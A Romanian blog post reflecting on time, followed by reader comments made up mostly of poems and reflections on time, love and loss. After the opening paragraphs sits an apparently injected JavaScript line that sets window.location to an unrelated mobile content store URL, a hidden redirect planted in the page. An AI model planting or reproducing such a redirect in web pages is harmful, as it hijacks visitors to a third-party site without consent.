Timpul, eternul vrajitor…

Sa imbratisam viata si sa simtim pulsul ei asa cum copilul din noi simte bucuria, odata cu primul gangurit si primul zambet.. prima lacrima si primul sarut. Ati simtit vartejul ametitor al vietii atunci cand timpul, eternul vrajitor te-a prins in goana lui, aducandu-va primul rid… prima lacrima? Ai simtit vartejul timpului, care pune stapanire si amprenta pe sufletul tau? Ai privit viitorului prin ochii de copil al sufletului tau? Te astept sa vorbim despre cum te a influentat Timpul … Duminica incepand cu ora 15.

Poposeste mereu alaturi de alt suflet si picteaza cerul… universul e al tau, al meu… al nostru … sa incercam sa-l cream dupa placul nostru, sa nu lasam timpul sa se joace cu noi… sa dam un sens pasilor nostri prin univers.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″;

11 comments

  1. traian

    Timpul măsoară trecerea și zbaterea noastră. Adesea măsoară sau consemnează doar căderi, răni, doar pierderi.
    În timp pierdem nu ani, nu frumusețe, ci risipim speranțe, energii, risipim iubiri, ne dezgolim întinându-ne intimitatea cu necalm, cu neadevăr, cu pierderea neprihănirii sufletești și trupești.
    Dintr-o primăvară frumoasă, senină, însorită, viața noastră devină o toamnă urâtă, dureros de urâtă. Provocarea vieții noastre cernute, călite prin vreme este aceea de a nu ne pierde sufletul, de a nu ne mutila sau răni prin pierderea credinței, dragostei, viselor și aripilor noastre care ne conduc spre libertate. Și totuși timpul nu ne aduce doar pierderi, ci și urcuș, nevoință, experiență pe care o dobândești pentru a fi mai bun, pentru a fi mai tu, pentru a nu mai pierde niciodată anotimpul alb al adevăratei și curatei iubiri.
    Timpul te coace ca pe o pâine în cuptorul vieții, iubirii, te călește pentru a nu te frânge și te învață să devii biruitor, să învingi ispite și să depășești obstacole.
    Te poate influența transformându-te în om pasăre sau în om povară, iar tu , pe valurile vieții te agăți, te prinzi, te salvezi sau pierzi păstrându-ți sau pierzându-ți reperele, principiile, energiile….
    Timpul măsoară calitatea noastră. Oricum ne-ar influența, întâmplările din viața noastră ne modelează, ne definesc continuu, izbăvindu-ne sau osândindu-ne ca oameni, înălțându-ne sau prăbușindu-ne.
    Dar trecerea vremii, călătoria prin timp ne oferă și șansa de a ne asculta sufletul, de a înțelege cine suntem, ce vrem, cum putem împlini aspirațiile noastre și ce drum trebuie să străbatem. Șansa de a deveni noi înșine: autentici, senini, fără mască și fără șovăială. Noi înșine.

  2. camelia
    camelia
    Author

    De la Andronache Virgil:
    Timpul m-a influentat…trecand. Timpul e in interiorul nostru, al fiecaruia, nu exista in afara noastra… asa ca faptele, intamplarile, evenimentele din viata fiecaruia exista numai prin noi si nu prin timp. Timpul – notiune abstracta, nu poate stopa existenta noastra si nici a faptelor noastre, a intamplarilor si evenimentelor ce ni se intampla.

  3. camelia
    camelia
    Author

    De la Liliana Cecilia:
    Mai sti…?

    Mai sti clipa magica ce ne-a unit
    si viata care trainic, ne-a iubit
    sub toate transformarile decorului
    si lacrima din soare a cerului.

    Mai sti cum suspinau izvoarele
    le tineau isonul, pasarile
    in dansul nostru le zaream
    priviri admirative, atrageam.

    Mai sti cum ma tineai de mana
    in serile cu o dalba luna
    ce si scria caierul de matase,
    scriind cu doruri, cat incape.

    Mai sti cum imi culegeai petale
    cu toate sarutarile-ti tale,
    si-mi desenai pe cer cu ele
    conturul, buzelor mele.

    Mai sti cum imi bateai in geam
    cu ploaie calda dintr-un ram
    si-n inimii rasareau a flori
    iubitule, imi dadeai fiori.

    Mai sti si noptile in care ma iubeai
    cu patimi de cearsaf in soapte
    ma rascoleai pojar in noapte
    si iubirea toata, imi cerseai.

    Mai stiu si-acuma pe de rost
    acele zile, care/au fost
    cu glas limpede de magie
    sarutandu-mi mana, mie.

  4. camelia
    camelia
    Author

    De la Herescu Elena:
    Și gândurile au un timp al lor pentru a putea fi exprimate. Le simți cum îți circulă prin minte, cum se zbat, încercând să găsească o fisură în perete, ca o rază de lumină care se chinuie să penetreze întunericul. Întinzi mâna să le ajuți.

    Dar uneori e prea devreme. Spargi coaja oului când încă acesta nu și-a desăvârșit conținutul. Și te trezești că așterni pe hârtie cuvinte fade, care nu-ți trezesc nici un fel de emoție, deși emoțiile lovesc în tine cu disperare.
    Le forțezi să se maturizeze deși nu este timpul lor. Le îndrumi pașii pe drumul tău fără a ține seama că ele au propriul lor drum.

    Scoți din tine gândurile, necoapte, aproape fără contur, cu grabă, pentru a scăpa de ele ca de pietrele care-ți îngreunează mersul, ițite în calea ta. Ți-e imposibil să admiți că au dreptul de a se transforma în timpul lor, în lumea lor, pe limba lor – și le obligi să se nască în universul tău.
    Doar pentru că nu suporți să le auzi cum se formează, doar pentru că ești prea grăbit să privești cuvinte.

    Vrei o minte liberă, lipsită de suferință, lipsită de așteptări, vrei să golești, să faci loc, pentru a te odihni.

    Nu înțelegi că, de fapt, obligându-ți emoțiile să vorbească înainte ca ele să știe a se exprima, nu te împlinești, dimpotrivă, rămâi ca un flămând care așteaptă zadarnic să se coacă pâinea, pentru a se hrăni.

    Gândurile au dreptul la jocul lor de lumini, la lumânările lor parfumate, la plăcerea de a se lăsa așteptate și din ce în ce mai dorite, fecioare care se pregătesc până în clipa în care vine vremea să se dezbrace și să rămână goale, în fața omenirii, mândre de perfecțiunea lor … HElena …

  5. camelia
    camelia
    Author

    De la Traian Calistru:
    Simțire

    simt primăvara picurând în mine însumi stropi de har
    ca un sărut contopit cu tristețea ierbii
    dăruind liniște dimineților albe
    dinaintea furtunilor iubirilor și patimilor noastre

    întind mâinile către nemine însumi ca și cum aș avea aripi
    și mă desprind din somnul nopții pentru a atinge cu tăcerea mea soarele
    iubind, murind, visând, încolțind din propria mea moarte ca un ideal de lumină

    mă despletesc către amurgul pictat pe filele de nenoapte ale vremii
    și fiecare firimitură de vis și de zbatere este culeasă de speranțele,
    gândurile, aspirațiile lumii învelite în noapte

    dincolo de zi este un câmp de flori de mac
    în care colorez respirația iubirii, ecourile,
    emoțiile atât de fine și de sângerânde ale trecerii noastre mute prin grădinile lumii
    iar sentimentul iubirii îl întrezăresc în zborul fluturilor și în cântecul păsărilor,
    în foșnetul frunzelor de mesteacăn și în irișii albaștri

    dincolo de câmpul cu flori suntem noi în noi înșine
    înlănțuiți în netrecere și neurât. T.Calistru

  6. camelia
    camelia
    Author

    De la Mihail Rujoiu:
    Dus de val

    Dus de val în largă mare
    Stau şi miros a pustiu ,
    Cum am ajuns aşa oare?!
    Nici acuma eu nu ştiu.

    Eram doar un trecător
    Pe a vieţii plajă amară,
    Şi tot răscoleam mereu
    După o şansă cât de rară.

    Dar zilele au trecut
    Şi nici şansă n-am găsit,
    Am ajuns un călător
    Şi de nimeni drag iubit.

    Am fost frate doar cu luna
    Şi duşman cu soarele,
    Căci de atâtea căutări
    Mi-am pierdut picioarele.

    Nici ochii nu mă mai ajută
    Să pot vedea în zare,
    Poate în sfârşit voi găsi
    Doar o dulce alinare.

    Nici nu ştiu ce zi mai este
    Printre atâtea căutări,
    Am ajuns ca un năuc
    Şi umblu cu capul în nori.

    Tot simţeam miros de ură
    Şi pe mal dar şi pe mare,
    Peste tot in jurul meu
    Era multă supărare.

    Doar cântece de sirene
    Se auzeau pe înserat,
    Dar eram atât de rece
    Nici nu puteam să răzbat.

    Doar priveam cu ochii închişi
    Pereţii uzi de la pleoape,
    Şi cu mâinile căutam
    Harpele adânci din ape.

    Apoi tresăream în gând
    Ca şi cum aş fi visat,
    Dar mereu pierdeam ceva
    Şi ajungeam de unde am plecat.

    Vântul înalţă nisipul
    Şi-l învârte în jurul meu,
    Vreau să ies din el,nu pot,
    Căci blestemul e prea greu.

    Mai bine rămân pe mare
    În miros alb de pustiu,
    Şi când mă voi întoarce oare?
    Nici acuma eu nu ştiu. Mihail Rujoiu

  7. camelia
    camelia
    Author

    De la Lara:

    TINE-MA MINTE!

    Tu, ancorat in fata misterului meu…
    Tine-ma minte si nu ma lasa sa dispar in parfum de ganduri!
    In inima mea nu este decat ceea ce am pe buzele mele…
    Acolo, in privirea mea, am mai mult decat mangaierea anotimpurilor….
    Tine-ma minte ca pe un secret patruns in carnea ta… ca pe un cuvant nescris,pierdut in ganduri mute…
    Sunt pasul umblat prin suflete ratacite… ascuns in zboruri tacute…
    Sunt lacrima ce a ars in palma ta…
    Tine-ma minte… ca pe sarutul asezat in pagini albe…
    Sunt dansul suspinat al ploii…
    Tine-ma minte ca pe o picatura sorbita de pe buzele tale…
    Mi-am ascuns zambetul in florile campului…
    Sunt soapta unei lumanari ce suspina in noapte….
    Sunt rasarit sculptat in valurile apusului…
    Tine-ma minte ca pe o speranta salvata de un inger…
    Tine-ma minte!…asa ca si cum as fi mereu prezenta acolo,
    Langa tine!
    * Cand iti va fi dor de mine, rasfoieste-mi cuvintele scrise, asculta-ma,mi-am asezat notele sufletului in palmele tale, danseaza-ma, ti-am aratat pasii care te conduc spre mine, gandeste-ma… vei sti ca te iubesc!… *
    Te imbratisez, suflet frumos, multumindu-ti ca m-ai aceptat in viata ta!
    Cu drag, Lara!

  8. camelia
    camelia
    Author

    De la Traian Calistru:

    Aspirație…
    dacă mâinile m-ar asculta, aș desena îngeri, colorându-i cu fire de nori albi și albastru senin de cer al inimii mele
    și zâmbetul meu ar răsări ca o lumină, bucurându-mă că am atins cu pământeana mea inspirație impresia unei neprihănite frumuseți

    aș modela din lutul iubirii conturul cuvintelor albe și curcubeul pentru a le păstra în adâncul inimii mele o mie de clipe și o mie de ani
    redându-le focului aprins din lacrimile zămislite de emoția iubirii mele infinite

    degetele mele ar uni pământul cu cerul despletind netăcerile în verbe de mătase,
    preînchipuind zborul sufletelor către înaltul viselor lor albe și sfinte

    dacă sufletul m-ar asculta, aș da viață icoanelor bucuriei mele, însuflețindu-le cu nădejdea mea și inspirația mea,
    iar oameni ar deveni fluturi, păsări sau îngeri
    și aș păși în amiaza vieții mele ca să mă transform într-o firimitură de pâine
    neștiută, neînsemnată, topită în dorul de zbor lin al unui suflet de soare…T Calistru

  9. camelia
    camelia
    Author

    Sa lasam pret de o clipa cununa de ganduri a sufletului si sa privim viata prin ochii de copil ai sufletului nostru. Sa simtim multitudinea de intrebari prin cuvinte spuse din suflet… nu gandite… Sa imbratisam viata si sa simtim pulsul ei asa cum copilul din noi simte bucuria, odata cu primul gangurit si primul zambet.. prima lacrima si primul sarut. Ati simtit vartejul ametitor al vietii atunci cand timpul, eternul vrajitor te-a prins in goana lui, aducandu-va primul rid… prima lacrima? Ati ratacit uneori fara sens pe cararile vietii, picurand din farmecul sufletului vostru, atingand alte suflete cu-n gest, cu-n zambet, colorand pret de cateva clipe visele – voastre – tale si ale mele…cu iubire si cu putin din penita sufletului vostru atat de insetat de cunoastere? Ati simtit valtoarea timpului, care pune stapanire si amprenta pe sufletul vostru ?… sau ati fost fermecat de timp si ati uitat sa priviti in sufletul interlocutorului tau, neintelegand ravagiile aduse de un cuvant sau un gest facut in pripa. Caci mimica si ochii tradeaza putin din tumultul fiecaruia. Priviti ochii interlocutorului, cantariti-va cuvintele si ofera intotdeauna ceva din frumusetea si coloritul sufletului vostru, ganditi-va ca oricand puteti fi voi aceia…
    Ma opresc de mii de ori si contemplu …lumea… uneori timpul grabit ne indeamna sa trecem grabiti sa nu privim in jur … sa nu simtim prezentul si lirismul lui ..sa privim mereu viitorul.

    “Te-ai gandit vreodata cat timp pierzi gandindu-te la ziua de ieri si temandu-te de ziua de maine? Poate atat de mult incat uiti de ziua de azi, cea care e de fapt cea mai importanta.
    Si zilele trec, si maine devine azi, apoi ieri, si abia atunci realizam ca a trecut, ca este probabil o zi pierduta pe care nimeni si nimic nu ne-o mai poate aduce inapoi.
    Si regretam lacrima pe care am lasat-o sa se scurga fierbinte pe obraz.
    Si regretam zambetul pe care l-am uitat acasa.
    Si regretam bratele care nu s-au deschis pentru o imbratisare sau buzele care au ramas inchise unui sarut.
    Fara sa ne dam seama am mai pierdut un AZI cu gandul la IERI si teama de MAINE.”

    Suntem nepasatori cu noi si cu cei de langa noi… trecem mereu in pasii alerti, nereusind sa coloram si sa ne lasam prea mult amprenta pe prezent
    Avem timp asa ne spunem mereu… Avem timp sa descoperim frumusetea din noi si sa evadam din lumea cruda … sa pasim intr-un vis de copil, intr-o lume a soaptelor si nesoaptelor si sa coloram putin stelele in avantul nostru…
    In graba noastra prin viata … spre un viitor incert.. uitam sa zambim, sa iubim …

    Poposeste mereu alaturi de alt suflet si picteaza cerul… universul e al tau, al meu… al nostru … sa incercam sa-l cream dupa placul nostru, sa nu lasam timpul sa se joace cu noi… sa dam un sens pasilor nostri prin univers. Camelia

  10. camelia
    camelia
    Author


    “Pierdut vis…Ma declar nul.
    O sa imbatranim toti intr-o buna zi si o sa ne uitam in oglinda cu stupoare, constatand ca fiecare rid e mai degraba un vis neimplinit, un an care a mai trecut fara sa facem ce simtitm, ce suntem, ce am visat candva!”Mihaela Radulescu

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>